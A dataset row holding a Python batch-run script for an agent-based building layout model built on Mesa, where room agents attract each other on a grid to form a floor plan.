Dataset schema (one row per column, with its type):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
Row 1 (fields before `content`):

| Field | Value |
|---|---|
| hexsha | b462c60deb6bb1cfa4fc1453e95138ace46b034f |
| size | 27,314 |
| ext | py |
| lang | Python |
| max_stars_repo_path | batch_run.py |
| max_stars_repo_name | Trippasch/ABM_Building_Model |
| max_stars_repo_head_hexsha | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | batch_run.py |
| max_issues_repo_name | Trippasch/ABM_Building_Model |
| max_issues_repo_head_hexsha | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | batch_run.py |
| max_forks_repo_name | Trippasch/ABM_Building_Model |
| max_forks_repo_head_hexsha | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content (batch_run.py):
from mesa import Agent, Model
from abm_project.attractor import Attractor
from mesa.time import *
from mesa.space import *
from mesa.datacollection import *
from mesa.batchrunner import *
import numpy as np
import pandas as pd
import itertools
import random
# Start of datacollector functions
def get_agent_type(model):
agent_type = [type(agent) for agent in model.agents]
return agent_type
def get_agent_pos(model):
agent_pos = [agent.pos for agent in model.agents]
return agent_pos
class BuildingModelBatch(Model):
"""
A model representing a building with some number of rooms (agents)
"""
description = ("A model representing a building with some number of different types of rooms (agents)"
+" being attracted to each other based on some set of complicated rules."
+"The result of the model is the best possible plan view of the building according to these rules.")
# id generator to track run number in batch run data
id_gen = itertools.count(1)
# grid height
grid_h = 20
# grid width
grid_w = 20
def __init__(
self,
width=20,
height=20,
sl1_rooms=1,
sl_rooms=2,
wc1_rooms=1,
wc_rooms=1,
liv_rooms=1,
entry_rooms=1,
kit_rooms=1,
off_rooms=1,
corr_rooms=1,
bath_rooms=1,
):
# Set parameters
self.sl1_rooms = sl1_rooms
self.sl_rooms = sl_rooms
self.wc1_rooms = wc1_rooms
self.wc_rooms = wc_rooms
self.liv_rooms = liv_rooms
self.entry_rooms = entry_rooms
self.kit_rooms = kit_rooms
self.off_rooms = off_rooms
self.corr_rooms = corr_rooms
self.bath_rooms = bath_rooms
self.width = width
self.height = height
self.torus = False
self.counter = 1
self.num_agents = (sl_rooms + wc_rooms
+ sl1_rooms + wc1_rooms
+ liv_rooms + entry_rooms
+ kit_rooms + off_rooms
+ corr_rooms + bath_rooms)
self.agents = []
self.current_id = 0
self.grid = SingleGrid(width, height, self.torus)
self.schedule = RandomActivation(self)
self.stable_pos = 0
self.stable_sl1 = 0
self.stable_sl = 0
self.stable_wc = 0
self.stable_wc1 = 0
self.stable_liv = 0
self.stable_entry = 0
self.stable_kit = 0
self.stable_corr = 0
self.stable_off = 0
self.stable_bath = 0
self.datacollector = DataCollector(
model_reporters={
# "Number of Rooms": lambda m: m.num_agents,
# "SL Rooms": lambda m: m.sl_rooms,
# "SL1 Rooms": lambda m: m.sl1_rooms,
# "WC Rooms": lambda m: m.wc_rooms,
# "WC1 Rooms": lambda m: m.wc1_rooms,
"agent_type": get_agent_type,
"agent_pos": get_agent_pos,
},
agent_reporters={
"agent_id": "unique_id",
"agent_pos": "pos",
},
)
self.make_agents()
self.running = True
self.reset = False
self.datacollector.collect(self)
def make_agents(self):
# Create Sleeping Rooms(1)
for i in range(self.sl1_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
sl1room = SL1RoomAgent(self.next_id(), pos, self, True, self.sl1_rooms)
self.agents.append(sl1room)
self.schedule.add(sl1room)
self.grid.place_agent(sl1room, pos)
else:
i -= 1
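# NOTE: decrementing the loop variable has no effect here, because `for i in range(...)`
# rebinds `i` on the next iteration; if the chosen cell is already occupied, this agent is
# simply skipped rather than re-placed. The same pattern repeats for every room type below.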
# Create Sleeping Rooms
for i in range(self.sl_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
slroom = SLRoomAgent(self.next_id(), pos, self, True, self.sl_rooms)
self.agents.append(slroom)
self.schedule.add(slroom)
self.grid.place_agent(slroom, pos)
else:
i -= 1
# Create WC Rooms
for i in range(self.wc_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
wcroom = WCRoomAgent(self.next_id(), pos, self, True, self.wc_rooms)
self.agents.append(wcroom)
self.schedule.add(wcroom)
self.grid.place_agent(wcroom, pos)
else:
i -= 1
# Create WC Rooms(1)
for i in range(self.wc1_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
wc1room = WC1RoomAgent(self.next_id(), pos, self, True, self.wc1_rooms)
self.agents.append(wc1room)
self.schedule.add(wc1room)
self.grid.place_agent(wc1room, pos)
else:
i -= 1
# Create Living Rooms
for i in range(self.liv_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
livroom = LivRoomAgent(self.next_id(), pos, self, True, self.liv_rooms)
self.agents.append(livroom)
self.schedule.add(livroom)
self.grid.place_agent(livroom, pos)
else:
i -= 1
# Create Entries
for i in range(self.entry_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
enroom = EntryRoomAgent(self.next_id(), pos, self, True, self.entry_rooms)
self.agents.append(enroom)
self.schedule.add(enroom)
self.grid.place_agent(enroom, pos)
else:
i -= 1
# Create Kitchens
for i in range(self.kit_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
kitroom = KitRoomAgent(self.next_id(), pos, self, True, self.kit_rooms)
self.agents.append(kitroom)
self.schedule.add(kitroom)
self.grid.place_agent(kitroom, pos)
else:
i -= 1
# Create Office Rooms
for i in range(self.off_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
offroom = OffRoomAgent(self.next_id(), pos, self, True, self.off_rooms)
self.agents.append(offroom)
self.schedule.add(offroom)
self.grid.place_agent(offroom, pos)
else:
i -= 1
# Create Corridors
for i in range(self.corr_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
corrroom = CorrRoomAgent(self.next_id(), pos, self, True, self.corr_rooms)
self.agents.append(corrroom)
self.schedule.add(corrroom)
self.grid.place_agent(corrroom, pos)
else:
i -= 1
# Create Baths
for i in range(self.bath_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
bathroom = BathRoomAgent(self.next_id(), pos, self, True, self.bath_rooms)
self.agents.append(bathroom)
self.schedule.add(bathroom)
self.grid.place_agent(bathroom, pos)
else:
i -= 1
def step(self):
"""
Run one step of the model. If all agents are stable, halt the model.
"""
# Reset counter of stable_pos agents
self.stable_pos = 0
self.stable_sl1 = 0
self.stable_sl = 0
self.stable_wc = 0
self.stable_wc1 = 0
self.stable_liv = 0
self.stable_entry = 0
self.stable_kit = 0
self.stable_corr = 0
self.stable_off = 0
self.stable_bath = 0
# tell all the agents in the model to run their step function
self.schedule.step()
# collect data
self.datacollector.collect(self)
print("--stable_pos : ", self.stable_pos)
if self.stable_pos == self.schedule.get_agent_count():
self.running = False
if self.schedule.steps / 1000 == self.counter:
print(self.schedule.steps)
self.reset = True
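# The model halts once every agent reports a stable position. As written, self.counter is
# never advanced, so the steps/1000 check raises the reset flag only once, at step 1000.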
# def run_model(self):
# for i in range(self.run_time):
# self.step()
class SL1RoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore=True, sl1_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.sl1_rooms = sl1_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is WCRoomAgent:
self.model.stable_sl1 += 1
if type(i) is CorrRoomAgent:
self.model.stable_sl1 += 1
if self.model.stable_sl1 == 2:
self.model.stable_pos += self.sl1_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WCRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.sl1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.sl1_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
class SLRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore=True, sl_rooms=2):
super().__init__(unique_id, pos, model, moore=moore)
self.sl_rooms = sl_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is CorrRoomAgent:
self.model.stable_sl += 1
if self.model.stable_sl == 2:
self.model.stable_pos += self.sl_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.sl_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.sl_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
class WC1RoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, wc1_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.wc1_rooms = wc1_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is OffRoomAgent:
self.model.stable_wc1 += 1
if self.model.stable_wc1 == 1:
self.model.stable_pos += self.wc1_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.wc1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.wc1_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class WCRoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, wc_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.wc_rooms = wc_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is SL1RoomAgent:
self.model.stable_wc += 1
if self.model.stable_wc == 1:
self.model.stable_pos += self.wc_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.wc_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.wc_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class LivRoomAgent(Attractor):
"""
An agent representing a Living room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, liv_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.liv_rooms = liv_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is EntryRoomAgent:
self.model.stable_liv += 1
if type(i) is BathRoomAgent:
self.model.stable_liv += 1
if type(i) is OffRoomAgent:
self.model.stable_liv += 1
if type(i) is CorrRoomAgent:
self.model.stable_liv += 1
if type(i) is KitRoomAgent:
self.model.stable_liv += 1
if self.model.stable_liv == 5:
self.model.stable_pos += self.liv_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is EntryRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.liv_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.liv_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
class EntryRoomAgent(Attractor):
"""
An agent representing an Entry room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, entry_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.entry_rooms = entry_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_entry += 1
if self.model.stable_entry == 1:
self.model.stable_pos += self.entry_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.entry_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.entry_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
class KitRoomAgent(Attractor):
"""
An agent representing a Kitchen with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, kit_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.kit_rooms = kit_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_kit += 1
# if type(i) is CorrRoomAgent:
# self.model.stable_kit += 1
# if type(i) is BathRoomAgent:
# self.model.stable_kit += 1
if self.model.stable_kit == 1:
self.model.stable_pos += self.kit_rooms
else:
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.kit_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.kit_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.west_pole()
class OffRoomAgent(Attractor):
"""
An agent representing an Office room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, off_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.off_rooms = off_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_off += 1
if type(i) is WC1RoomAgent:
self.model.stable_off += 1
# if type(i) is CorrRoomAgent:
# self.model.stable_off += 1
if self.model.stable_off == 2:
self.model.stable_pos += self.off_rooms
else:
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WC1RoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.off_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.off_rooms > 0:
if random.randint(1,4) == 4:
self.west_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class CorrRoomAgent(Attractor):
"""
An agent representing a Corridor with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, corr_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.corr_rooms = corr_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is SL1RoomAgent:
self.model.stable_corr += 1
if type(i) is SLRoomAgent:
self.model.stable_corr += 1
if type(i) is LivRoomAgent:
self.model.stable_corr += 1
# if type(i) is KitRoomAgent:
# self.model.stable_corr += 1
# if type(i) is OffRoomAgent:
# self.model.stable_corr += 1
if self.model.stable_corr == 4:
self.model.stable_pos += self.corr_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SLRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.corr_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.corr_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class BathRoomAgent(Attractor):
"""
An agent representing a Bathroom with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, bath_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.bath_rooms = bath_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_bath += 1
# if type(i) is KitRoomAgent:
# self.model.stable_bath += 1
if self.model.stable_bath == 1:
self.model.stable_pos += self.bath_rooms
else:
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.bath_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.bath_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# parameter lists for each parameter to be tested in batch run
br_params = {
"sl1_rooms": [1],
"sl_rooms": [2],
"wc1_rooms": [1],
"wc_rooms": [1],
"liv_rooms": [1],
"entry_rooms": [1],
"kit_rooms": [1],
"off_rooms": [1],
"corr_rooms": [1],
"bath_rooms": [1],
}
br = BatchRunner(
BuildingModelBatch,
br_params,
iterations=1,
max_steps=10000,
model_reporters={"Data Collector": lambda m: m.datacollector},
agent_reporters={"agent_pos": "pos"},
)
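# Each completed run's DataCollector is captured via model_reporters, so the per-step
# model data can be pulled back out after run_all() (see the __main__ block below).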
if __name__ == "__main__":
br.run_all()
br_df = br.get_model_vars_dataframe()
br_adf = br.get_agent_vars_dataframe()
br_step_data = pd.DataFrame()
for i in range(len(br_df["Data Collector"])):
if isinstance(br_df["Data Collector"][i], DataCollector):
i_run_data = br_df["Data Collector"][i].get_model_vars_dataframe()
br_step_data = pd.concat([br_step_data, i_run_data], ignore_index=True)  # DataFrame.append was removed in pandas 2.0
br_step_data.to_csv("BuildingModelBatch_Step_Data.csv")
# for i in range(len(br_adf["agent_pos"])):
# if isinstance(br_adf["agent_pos"][i], DataCollector):
# i_run_data = br_adf["agent_pos"][i].get_agent_vars_dataframe()
